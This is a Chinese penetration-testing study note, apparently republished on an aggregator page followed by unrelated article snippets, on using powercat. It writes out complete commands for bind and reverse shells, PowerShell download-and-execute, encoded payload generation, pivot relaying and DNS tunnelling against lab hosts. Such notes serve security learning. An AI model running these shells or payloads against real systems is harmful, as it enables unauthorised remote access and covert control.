当前位置: 首页 > news >正文

【内网学习笔记】8、powercat 的使用

1、下载安装 powercat

powercat 可以视为 nc 的 powershell 版本,因此也可以和 nc 进行连接。

powercat 可在 github 进行下载,项目地址为:https://github.com/besimorhino/powercat

下载下来 powercat.ps1 文件后,直接导入即可

 Import-Module .\powercat.ps1

如果提示未能加载指定模块,则可能是权限问题,可以参照之前写的 【内网学习笔记】2、PowerShell 文章中的方法对其赋予权限,即在管理员模式下运行以下命令

Set-ExecutionPolicy Unrestricted

之后就可以导入 powercat 了,导入成功后,输入 powercat -h 可以看到帮助信息。

如果没有权限,也可以直接下载远程文件进行绕过。

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

不过由于 github 在国内可能会无法打开,因此可以使用 web 代理站点或者把 powercat.ps1 文件放到自己的服务器上进行下载。

2、powercat 的使用

powercat 命令参数

-l		监听模式
-p		指定监听端口
-e		指定启动进程的名称
-v		显示详情
-c		指定想要连接的 IP 地址
-ep		返回 powershell
-dns	使用 dns 通信
-g		生成 payload
-ge		生成经过编码的 payload,可以直接使用 powershell -e 执行该 payload

可以看到和 nc 的命令还是很相似的。

正向连接

Kali 上的 nc 连接到靶机

nc -v rhost rport
nc -v 172.16.214.21 4444

靶机开启监听,等待 Kali 连接

powercat -l -v -p lport -e cmd.exe
powercat -l -v -p 4444 -e cmd.exe

反向连接

Kali 上开启监听

nc -lvp 4444

靶机向 kali 发起连接

powercat -c rhost -p rport -e cmd.exe
powercat -c 172.16.214.46 -p 4444 -e cmd.exe

返回 powershell

攻击机上运行

powercat -l -v -p lport
powercat -l -v -p 4444

靶机上运行

powercat -c rhost -p rport -v -ep
powercat -c 172.16.214.21 -p 4444 -v -ep

作为跳板使用

测试环境为:

kali			172.16.214.47
windows7	172.16.214.2
windows10	172.16.214.21

将 win7 作为跳板机,让 kali 通过 win7 连接到 windows10

在 win10 中执行以下命令

powercat -l -v -p 4444 -e cmd.exe

在 win7 中执行以下命令

powercat -l -v -p 5555 -r tcp:172.16.214.21:4444

最后在 kali 下连接 win7

nc -v 172.16.214.2 5555

powercat 生成 payload

在攻击机上运行以下命令生成 shell.ps1 payload 文件

powercat -l -p 4444 -e cmd -g > shell.ps1

将 shell.ps1 文件拷贝到目标主机上后,执行 shell.ps1 文件

之后在攻击机上运行以下命令即可获得 shell

powercat -c rhost -p rport -v
powercat -c 172.16.214.21 -p 4444 -v 

反向连接也可以

在攻击机上生成 ps1 文件,并开启监听

powercat -c rhost -p rport -ep -g > shell.ps1
powercat -c 172.16.214.2 -p 4444 -ep -g > shell.ps1
powercat -l -p 4444 -v

之后在靶机上,运行 ps1 文件就会上线了,如果不想生成文件,也可以使用 -ge 生成经过编码的 payload

在攻击机上生成 payload,并开启监听

powercat -c 172.16.214.2 -p 4444 -ep -ge
powercat -l -p 4444 -v

在靶机上执行刚生成的 payload

powershell -e payload

建立 dns 隧道连接

powercat 的 dns 隧道是基于 dnscat 设计的,因此在服务端需要使用 dnscat 连接。

在服务端上安装 dnscat ,以 kali 为例

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

命令运行完之后,执行以下命令开启服务端

ruby dnscat2.rb powercat -e open --no-cache

在靶机下,执行以下命令,建立 dns 隧道

powercat -c 172.16.214.47 -p 53 -dns powercat -e cmd.exe

此时,在 kali 上就能看到回连的会话了

sessions				#	查看所有会话
session -i 1 		#	选择指定的会话进行交互

不过实测,虽然能返回会话,但不能执行命令,暂不清楚原因是什么。

powercat 暂时就记录这些,其他的比如文件传输什么的就不记了,毕竟使用频率几乎为零,平时使用最多的可能还是拿它来反弹 shell,不过为什么不用 CS 或者 MSF 呢,不更香嘛。

原文链接:

https://teamssix.com/year/210601-155103.html

参考链接:

https://blog.csdn.net/qq_32393893/article/details/108904697

https://cloud.tencent.com/developer/article/1772183

更多信息欢迎关注我的微信公众号:TeamsSix

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.exyb.cn/news/show-2753.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

栈和队列(二) : 用栈实现队列

leetcode232.用栈实现队列 https://leetcode-cn.com/problems/implement-queue-using-stacks/ 使用栈实现队列的下列操作: push(x) – 将一个元素放入队列的尾部。 pop() – 从队列首部移除元素。 peek() – 返回队列首部的元素。 empty() – 返回队列是否为空。…...

测试技巧:弱网测试

弱网测试场景 当前APP网络环境比较复杂,网络制式有2G、3G、4G网络,还有越来越多的公共Wi-Fi。不同的网络环境和网络制式的差异,都会对用户使用app造成一定影响。另外,当前app使用场景多变,如进地铁、上公交、进电梯等…...

PMP哪里报名

首先了解下PMP考试时间,一年四次,正常情况是每年3、6、9、12月份考试; 其次了解PMP考试需要两次报名,分别是英文报名和中文报名;且两次报名通过后,才能正常考试。 下面分别介绍PMP英文报名和PMP考试中文报…...

Thread类的常用方法

Thread类的常用方法 void start(): 启动线程,并执行对象的run()方法run(): 线程在被调度时执行的操作static Thread currentThread(): 返回当前线程。在Thread子类中就 是this,通常用于主线程和Runnable实现类String getName(): 返回线程的名…...

浅谈设计模式(三)

前言 之前详细介绍了几种常用的设计模式,最后总结一下附上所有设计模式的类图以及六大设计原则 一、创建型 1.Factory Method(工厂方法) 定义:定义了一个创建对象的接口,但由子类决定要实例化的类是哪一个。工厂方法…...

AR增强现实让科技贴近生活

AR也叫增强现实,它是在1990年被正式提出的,在时间上要比VR虚拟现实技术晚一些,它的实现主要通过三维空间、场景交融、现实视频等技术相互作用、融合实现的。 AR增强现实技术在工业领域中,有着超强的适用性,假设某件工…...

c++程序设计中虚基类,多继承知识点

一.前言 如上 二.题目 分别声明Teacher(教师)类和Cadre(干部)类,采用多重继承方式由这两个类派 生出新类Teacher_Cadre(教师兼干部)类。要求: (1)在两个基类中都包含姓名、年龄、性别、地址、电话等数据成员。 (2&a…...

FFmpeg:avcodec_encode_video()

本文简单分析FFmpeg的avcodec_encode_video2()函数。该函数用于编码一帧视频数据。avcodec_encode_video2()函数的声明位于libavcodec\avcodec.h,如下所示。 /*** Encode a frame of video.** Takes input raw video data from frame and writes the next output p…...

SpringBoot中必须掌握的45个注解

1.SpringBoot/spring SpringBootApplication: 包含Configuration、EnableAutoConfiguration、ComponentScan通常用在主类上; Repository: 用于标注数据访问组件,即DAO组件; Service: 用于标注业务层组件; RestController: …...

侯捷CPP---面向对象(上)

侯捷CPP---面向对象(上)前言头文件防卫式声明class 分类不带指针的class(complex)成员变量私有化inline function(内联函数)构造函数常量成员函数参数传递返回值传递友元函数操作符重载临时对象带指针的cla…...

使用注解开发

1; 2.mapper 2.测试...

苏宁易购启动六一宝宝节,首提“共情消费”

5月26日晚8点,苏宁易购六一宝宝节掰头大会在多个平台播出。六一宝宝节全面启动。 六一宝宝节定位于打破营销套路,打破传统电商促销节奏。它是大促,更是一场成年人释放压力、共情消费的盛典。 掰头大会灵魂辩题 开启宝宝节 六一宝宝节的启…...

设计一个windows应用程序,定义一个Student类,包含学号和姓名两个字段,并定义一个班级类ClassList

设计一个windows应用程序,定义一个Student类,包含学号和姓名两个字段,并定义一个班级类ClassList,该类包含一个Student集合,使用索引器访问该集合。 (1)创建一个Windows应用程序Myproject6_1。 …...

python笔记19年8月23日

-------------py打包exe教程------------ 准备好需要转换的py文件和一张用于做图标.ico的照片 将他们存放于同一个文件夹中,文件的路径全部为英文路径 1.利用cmd窗口安装pyinstaller插件 指令 :pip install pyinstaller 2.使用cd指令到py文件夹 3.执行命令 pyinstaller -F -i X…...

系统集成模拟3-55分

1、合同法律关系是指由合同法律法规调整的在民事流转过程中形成的(权利义务关系) 2、当已经采取了多种沟通方式还未能与用户达成一致时,应考虑沟通升级原则-双方高层沟通 3、数据域安全包括:行级数据域安全,数据域安全…...

Centos7 配置DHCP

实验内容及步骤 1、实验背景 某企业计划构建一台 DHCP服务器来解决IP地址动态分配的问题,要求能够分配 IP地址以及网关、DNS等其它网络属性信息。同时要求DHCP服务器为DNS、WEB、Samba服务器分配固定IP 地址。 2、网络拓扑 略. 3、实验环境 假设企业DHCP服务器…...

JVM常见配置汇总

堆设置 -Xms:初始堆大小-Xmx:最大堆大小-XX:NewSizen:设置年轻代大小-XX:NewRation:设置年轻代和年老代的比值。如:为3,表示年轻代与年老代比值为1:3,年轻代占整个年轻代年老代和的1/4-XX:SurvivorRation:年轻代中Eden区与两个Survivor区的比…...

从类,API,框架三个层面学习如何设计可复用软件实体的具体技术学习心得

从类,API,框架三个层面学习如何设计可复用软件实体的具体技术学习心得软件复用概述软件复用概念软件复用的软件支持三方面讲述软件复用类代码复用设计的复用分析的复用测试信息的复用Liskov替换原则 ——LSPAPI框架软件复用概述 软件复用概念 软件复用(…...

惠普(HP) Officejet Pro 8610商用彩色喷墨一体机

专业彩色打印件的单页成本比激光打印机低 50%,从而在日常打印中节省更多打印成本。无论您身在何处,均可通过任意移动设备进行打印。 借助惠普“云打印”技术,您现在可以随时随地,随心打印。使用智能复印解决方案,创建完美无瑕的副本,同时轻松打印双面身份证。专业彩色打印…...

easyPOI和导入复杂excel的各种坑

//easyPOI的依赖 <dependency><groupId>cn.afterturn</groupId><artifactId>easypoi-base</artifactId><version>4.1.3</version> </dependency>//要操作pdf,word还是用原生poi比较好 <dependency><groupId>org.…...

[HDU2520]我是菜鸟,我怕谁(每日一题5.30)

题目链接&#xff1a;Problem - 2520 (hdu.edu.cn) 乍一看这个题&#xff0c;发现不就是匀加速直线运动么&#xff0c;于是写出了如下的代码&#xff1a; #include <iostream>using namespace std;int d(int t);int main() {int T;cin >> T;while(T--){int t;cin …...

个性化个人主页html5模板

介绍&#xff1a; 个性化个人主页html5模板 网盘下载地址&#xff1a; http://kekewl.net/tARDuX5n02U0 图片&#xff1a;...

倒计时10天!不填这个信息,你的货物将无法入库!

近日&#xff0c;亚马逊再次通知卖家&#xff1a;“2021年6月11日之前&#xff1a;您必须在负责人控制面板中填报 CE 标志商品的欧盟负责人&#xff0c;否则FBA入库货件将无法进入欧盟/欧洲经济区。” 从现在算起&#xff0c;就只剩下10天时间了&#xff01;因为是欧盟颁布的法…...

NPDP资格认证机构为什么广受市场欢迎

NPDP资格认证又称为产品经理国际资格认证&#xff0c;通过认证可以取得非常专业的资格证书。近年来不断有考生为了通过这一认证而进入一些深受欢迎的NPDP资格认证培训机构学习。那么&#xff0c;这些NPDP资格认证机构为什么会如此受市场的欢迎&#xff1f; 一、证书本身的含金…...

推荐系统之局部敏感哈希(LSH)

推荐系统之局部敏感哈希&#xff08;LSH&#xff09; 前言 局部敏感哈希的基本思想&#xff1a;是希望让相邻的点落入同一个“桶”&#xff0c;这样在进行最近邻搜索时&#xff0c;我们仅需要在一个桶内&#xff0c;或相邻几个桶内的元素中进行搜索即可。如果保持每个桶中的元…...

3年以上测试工程师,你的出路在哪里?

说起软件测试&#xff0c;很多人看好这个行业&#xff0c;觉得钱多事少加班少。 但我周围很多工作3年的测试小伙伴都很焦虑&#xff1a; 明明是各个公司必备技术岗&#xff0c;却处于业务边缘。明明是个技术岗位&#xff0c;每天只是“点点点”&#xff0c;能力上不去&#x…...

带你一起探究Android事件分发机制,使用指南

导语 2020年是转折的一年&#xff0c;2021年算是收获的一年&#xff0c;趁着金三银四开始找工作。先分享一下offer的情况 阿里高德(offer)爱奇艺(offer)腾讯视频(offer)小米(被拒)今日头条(被拒) 在面试的过程中我深深的感受到&#xff0c;对于一个优秀的安卓开发来说&#…...

Xshell 连接不上Linux Centos 7的解决方法之设置静态IP

前序 最近在开发项目&#xff0c;需要在服务器部署数据库、ftp文件管理等相关内容时&#xff0c;为了方便操作&#xff0c;使用Xshell会话管理工具进行服务器操作。出现连不上服务器网络的问题&#xff0c;就所遇问题进行学习解决方案及总结记录。 配置虚拟机网络 1.在虚拟机…...

互联网大佬“退休”轶事:马云摸着石头过河,有一人则笑到最后!

人们习惯靠趋势预测未来&#xff0c;可事关人性的观察&#xff0c;变化的可能性大都写在历史里。 已故的李敖先生&#xff0c;本世纪初&#xff0c;在中国三座最高学府留下了三场“刀尖上舔血”的演讲。谈及未来&#xff0c;他丢出一句话&#xff1a;“形势大好&#xff0c;人…...

来自天堂的连枷

来自天堂的连枷主要内容 《来自天堂的连枷》讲述的是&#xff1a;一个农夫将角长得越来越大的两头牛卖给屠户&#xff0c;他们商定的支付方式是&#xff0c;农夫给屠夫一配克油菜籽&#xff0c;然后由屠夫点数&#xff0c;一粒油菜籽付一块金币。途中农夫掉了一粒油菜籽&#…...

瓢城Web俱乐部

网址:http://www.ycku.com/course/ 一个不错的在线视频教程网站&#xff0c;部分教程还在更新&#xff0c;在手机或者iPad上扫描网页上的二维码可以在移动端打开课程&#xff0c;还是很方便的&#xff0c;每节课的时间比较长&#xff0c;讲的很详细&#xff0c;也可以下载观看。…...

运维人生攻城狮的第一次搬家

工作以来搬家都搬了好多趟了&#xff0c;今天再次搬家&#xff0c;下面开始回忆并记录下来&#xff0c;用于缅怀我们攻城狮的青春人生。 刚开始上班第一间公司&#xff0c;福利还不错&#xff0c;先住在公司宿舍&#xff0c;一间宿舍几间房&#xff0c;和几个前辈程序员住一起…...

html静态页面案例

前言 开始学习前端时适用的静态网页小案例 htmlcss 一、效果 二、页面分布 分为五个基础页面 index.html information.html scenery.html ticket.html about.html 1.index.html <!DOCTYPE html> <html><head><meta charset"utf-8">…...

前端框架——BootStrap学习

BootStrap简单总结下&#xff1a;1.栅格系统&#xff0c;能够很好的同时适应手机端和PC端&#xff08;及传说中的响应式布局&#xff09; 2.兼容性好接下来是对BootStrap学习的一些基础案例总结和回顾: 首先引入&#xff1a;bootstrap.min.css&#xff0c;jquery.js&#xff0…...

(项目实战五)响应式案例和关于

一、案例 案例页面的代码如下&#xff1a;<nav class"navbar navbar-default navbar-fixed-top"><div class"container"><div class"navbar-header"><a href"#" class"navbar-brand logo"><img …...

[jQuery知识]jQuery之知识十一-Ajax初级

前言 1.Ajax 概述 2.load()方法 3..get()和.post() Ajax 全称为:“Asynchronous JavaScript and XML”(异步 JavaScript 和 XML)&#xff0c; 它并不是 JavaScript 的一种单一技术&#xff0c;而是利用了一系列交互式网页应用相关的技术所形 成的结合体。使用 Ajax&#xff0…...

[09]项目实战-PC 端固定布局(9)

一&#xff0e;资讯内容 和首页一样&#xff0c;只不过这里&#xff0c;布局方式有所不同&#xff0c;具体如下&#xff1a; 二&#xff0e;代码详解 //全部代码 <figure class"tour"><img src"img/tour1.jpg" alt"曼谷-芭提雅6 日游"…...

Ajax 整理总结(入门)

Ajax 学习要点&#xff1a;1.Ajax 概述2.load()方法3.$.get()和$.post()4.$.getScript()和$.getJSON()5.$.ajax()方法6.表单序列化一&#xff0e;Ajax 概述 1.JavaScript&#xff0c;通过用户或其他与浏览器相关事件捕获交互行为&#xff1b; 2.XMLHttpRequest 对象&#xff0c…...

三千弱水,总有一瓢知我冷暖

红尘太喧嚣&#xff0c;非我所恋&#xff1b;世间太繁华&#xff0c;非我所羡&#xff1b;情感太易淡&#xff0c;非我所控。曾经受过的伤已是寻常&#xff0c;曾经爱过的人已成篇章&#xff0c;那个渴望在诗酒年华&#xff0c;与伊策马天涯的我&#xff0c;如今&#xff0c;只…...

[11]项目实战-PC 端固定布局(11)

一&#xff0e;风景欣赏 预览图和首页差不多。具体代码如下&#xff1a; //风景欣赏 HTML 部分<div class"list scenery"><section><h2>风景欣赏</h2><figure><img src"img/s1.jpg" alt"曼谷-芭提雅"><…...

完善1

1〉题目避免重复&#xff1a;可以先看计算结果对于计算结果相同的式子比较x&#xff0c;y的值&#xff0c;看是否相同。 2〉题目数量&#xff1a;通过一个for循环语句for&#xff08;int i ,i<num,i&#xff09;,num为要计算的题目的数量 3〉打印方式&#xff1a;直接竖排的…...

项目实战--响应式导航[1]

一&#xff0e;响应式导航 .logo { padding:0; } #myCarousel { margin: 50px 0 0 0; //轮播图和导航不会重叠 } #navbar-collapse ul { margin-top:0; } .carousel-inner img { margin: 0 auto; //让轮播器的图片自动居中 } .carousel-control { font-size: 100…...

Bootstrap项目实战,响应式网站(李炎恢)

网站首页 布局与实现 一、文件准备 1、导入bootstrap 相关css 和js文件&#xff0c;以及jQuery<link rel"stylesheet" href"bootstrap-3.3.7-dist/css/bootstrap.min.css"> <script src"jquery-3.3.1.min.js"></script> <s…...

项目实战--案例和关于[7]

一&#xff0e;案例内容 #case { padding: 40px 0; background-color: #eee; text-align: center; } #case h4 { color: #666; } #case p { color: #666; line-height: 1.6; } <div class"jumbotron"> <div class"container"> <hgrou…...

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)

系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入&#xff08;宽字节注入&#xff09;_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记3- bool注入&#xff08;布尔型盲注&#…...

javascript学习之BOM come from 北风网+瓢城俱乐部,特此感谢!

window.blur()使窗体或对象失去焦点&#xff1b;与之相反的代码是window.focus();但是各个浏览器之间有冲突并不是所有的浏览器都支持这两个代码但有的浏览器会屏掉这个弹窗为了防止浏览器将弹窗屏屏蔽&#xff0c;可以将弹窗代码加到事件中去&#xff0c;这样浏览器会识别出这…...

HTML5项目实战之旅行社网站——移动端流体布局

主页面&#xff08;index.html&#xff09;&#xff1a; <!DOCTYPE html> <html lang"zh-cn"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0,minimum-scale…...

java 李炎恢_李炎恢bootstarp_项目实战__瓢城企业(注释+源码)

Threadlocal使用CaseThreadlocal能够为每个线程分配一份单独的副本,使的线程与线程之间能够独立的访问各自副本.Threadlocal 内部维护一个Map,key为线程的名字,value为对应操作的副本. /** ...HttpUrlConnection发送url请求(后台springmvc)1.HttpURLConnection发送url请求 publ…...

php李炎恢笔记,一步步学习php笔记 李炎恢瓢城web俱乐部

#{;;#ccc;;}#{font-;;;background:url("../../images/logo1.jpg")no-repeat;margin:40px0050px;}#headerh1a{width:210px;height:39px;display:block;text-indent:-9999px;/*缩进*//*border:2pxsolid#ccc;*/}#headerul{text-align:right;padding:30px50px00;}#header…...

一步步学习PHP笔记(李炎恢瓢城web俱乐部-多用户留言系统)01

本课&#xff1a;divcss实现首页效果&#xff1a; 开发工具&#xff1a;xampp phpstorm 笔记目的&#xff1a;仅做记录使用&#xff0c;方便日后查看 代码目录结构&#xff1a; index.php: <?phpdefine("ROOT_WEB",true); ?> <!DOCTYPE html PUBLIC &quo…...